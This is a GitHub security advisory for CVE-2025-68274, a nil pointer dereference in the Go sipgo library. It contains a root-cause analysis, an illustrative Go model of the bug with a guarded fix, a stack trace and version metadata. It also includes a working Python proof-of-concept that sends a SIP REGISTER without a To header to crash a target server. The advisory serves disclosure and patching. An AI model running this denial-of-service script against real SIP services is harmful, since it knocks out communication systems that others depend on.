GHSA-C623-F998-8HHV
Vulnerability from github – Published: 2025-12-16 21:24 – Updated: 2025-12-20 03:33
Description
A nil pointer dereference vulnerability was discovered in the SIPGO library's NewResponseFromRequest function that affects all normal SIP operations. The vulnerability allows remote attackers to crash any SIP application by sending a single malformed SIP request without a To header.
The vulnerability occurs when SIP message parsing succeeds for a request missing the To header, but the response creation code assumes the To header exists without proper nil checks. This affects routine operations like call setup, authentication, and message handling - not just error cases.
Note: This vulnerability affects all SIP applications using the sipgo library, not just specific configurations or edge cases, as long as they make use of the NewResponseFromRequest function.
Technical details
The vulnerability is located in /sip/response.go at line 242 in the NewResponseFromRequest function:
```go
if _, ok := res.To().Params["tag"]; !ok {
	uuid, _ := uuid.NewRandom()
	res.to.Params["tag"] = uuid.String()
}
```
Root Cause:
1. Missing To Header: When any SIP request is sent without a To header, the SIP message parsing succeeds but the To header is never set in the request object.
2. Header Copying Logic: During response creation in NewResponseFromRequest, the code attempts to copy headers from the request to the response. Since there's no To header in the request, no To header is copied to the response.
3. Unsafe Assumption: The response creation code assumes the To header exists and calls res.To().Params["tag"] without checking if res.To() returns nil, causing a nil pointer dereference.
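The following Go program is an added illustration, not sipgo's code: the Header and Message types, parseRequest and the guard flag are stand-ins constructed for this example. It models the header-copying path described in the root cause: a REGISTER without a To header parses successfully, the response built from it inherits no To header, and the tag check then dereferences nil unless it is guarded.

```go
package main

import (
	"errors"
	"fmt"
	"strings"
)

// Minimal stand-ins for a SIP message; NOT the sipgo API. Header values are
// dropped and only parameters kept, because only the To tag matters here.
type Header struct{ Params map[string]string }
type Message struct{ headers map[string]*Header }

// To returns the To header, or nil when the request never carried one.
func (m *Message) To() *Header { return m.headers["to"] }
// parseRequest parses just enough: a request with no To header still parses
// successfully, which is the precondition of the bug.
func parseRequest(raw string) *Message {
	m := &Message{headers: map[string]*Header{}}
	for _, line := range strings.Split(strings.SplitN(raw, "\r\n\r\n", 2)[0], "\r\n")[1:] {
		name, val, _ := strings.Cut(line, ":")
		h := &Header{Params: map[string]string{}}
		for _, p := range strings.Split(val, ";")[1:] { // value;k=v;k=v
			k, v, _ := strings.Cut(strings.TrimSpace(p), "=")
			h.Params[k] = v
		}
		m.headers[strings.ToLower(strings.TrimSpace(name))] = h
	}
	return m
}

var ErrNoTo = errors.New("sip: request has no To header")
// newResponseFromRequest copies the request headers into the response and adds a
// To tag. guard=false reproduces the bug (nil pointer panic when To is absent);
// guard=true rejects the request with an error instead of panicking.
func newResponseFromRequest(req *Message, guard bool) (*Message, error) {
	res := &Message{headers: map[string]*Header{}}
	for k, h := range req.headers {
		res.headers[k] = h // no To in the request means no To in the response
	}
	if guard && res.To() == nil {
		return nil, ErrNoTo
	}
	if _, ok := res.To().Params["tag"]; !ok { // res.To() is nil if unguarded
		res.To().Params["tag"] = "constructed-tag" // sipgo uses a random UUID
	}
	return res, nil
}
func main() { // constructed REGISTER with no To header, as in the advisory
	fmt.Println(newResponseFromRequest(parseRequest("REGISTER sip:x SIP/2.0\r\nFrom: <sip:a@x>;tag=1\r\n\r\n"), true))
}
```

In a real server the guarded path should map ErrNoTo to a rejection of the request rather than a crash of the whole process.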
Stack Trace:
```
panic: runtime error: invalid memory address or nil pointer dereference
[signal SIGSEGV: segmentation violation code=0x2 addr=0x70 pc=0x10261fcb4]

goroutine 175 [running]:
github.com/emiago/sipgo/sip.NewResponseFromRequest(0x14000433e00, 0x191, {0x1026b074b, 0xb}, {0x0, 0x0, 0x0})
	/Users/user/Documents/GitHub/sipgo/sip/response.go:242 +0x394
```
Impact
This vulnerability affects all SIP applications using the sipgo library when using NewResponseFromRequest to generate SIP responses.
Attack Impact:
- Availability: Complete denial of service - application crashes immediately
- Remote Exploitation: Yes
- Authentication Required: No - vulnerability triggers during initial response generation which does not require authentication
How to reproduce the issue
To reproduce this issue, you need:
- A SIP application using the vulnerable sipgo library
- Network access to send SIP messages to the target
Steps:
1. Save the following Python script as sipgo-response-dos.py:
```python
#!/usr/bin/env python3
import socket
import sys
import time
import random

def create_malformed_register(target_ip, target_port):
    call_id = f"sipgo-dos-{int(time.time())}"
    tag = f"sipgo-dos-{random.randint(1000, 9999)}"
    branch = f"z9hG4bK-sipgo-dos-{random.randint(10000, 99999)}"

    # Craft malformed SIP request without To header
    sip_message = (
        f"REGISTER sip:{target_ip}:{target_port} SIP/2.0\r\n"
        f"Via: SIP/2.0/UDP 192.168.1.100:5060;rport;branch={branch}\r\n"
        f"From: <sip:attacker@192.168.1.100>;tag={tag}\r\n"
        f"Call-ID: {call_id}\r\n"
        f"CSeq: 1 REGISTER\r\n"
        f"Contact: <sip:attacker@192.168.1.100:5060>\r\n"
        f"Content-Length: 0\r\n"
        f"\r\n"
    )
    return sip_message

if __name__ == "__main__":
    if len(sys.argv) != 3:
        print("Usage: python3 sipgo-response-dos.py <target_ip> <target_port>")
        sys.exit(1)

    target_ip = sys.argv[1]
    target_port = int(sys.argv[2])

    sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    payload = create_malformed_register(target_ip, target_port)

    print(f"Sending malformed REGISTER to {target_ip}:{target_port}")
    sock.sendto(payload.encode('utf-8'), (target_ip, target_port))
    print("Exploit sent - target should crash immediately")
```
2. Run the script against a vulnerable sipgo application:
```bash
python3 sipgo-response-dos.py <target_ip> <target_port>
```
3. Observe that the target application crashes with a SIGSEGV panic.
Note: The key element is the missing To header in any SIP request, which triggers the nil pointer dereference.
{
"affected": [
{
"package": {
"ecosystem": "Go",
"name": "github.com/emiago/sipgo"
},
"ranges": [
{
"events": [
{
"introduced": "0.3.0"
},
{
"fixed": "1.0.0-alpha-1"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2025-68274"
],
"database_specific": {
"cwe_ids": [
"CWE-476"
],
"github_reviewed": true,
"github_reviewed_at": "2025-12-16T21:24:16Z",
"nvd_published_at": "2025-12-16T22:15:50Z",
"severity": "HIGH"
},
"id": "GHSA-c623-f998-8hhv",
"modified": "2025-12-20T03:33:26Z",
"published": "2025-12-16T21:24:16Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/emiago/sipgo/security/advisories/GHSA-c623-f998-8hhv"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-68274"
},
{
"type": "WEB",
"url": "https://github.com/emiago/sipgo/commit/dc9669364a154ec6d134e542f6a63c31b5afe6e8"
},
{
"type": "PACKAGE",
"url": "https://github.com/emiago/sipgo"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N",
"type": "CVSS_V4"
}
],
"summary": "SIPGO is Vulnerable to Response DoS via Nil Pointer Dereference"
}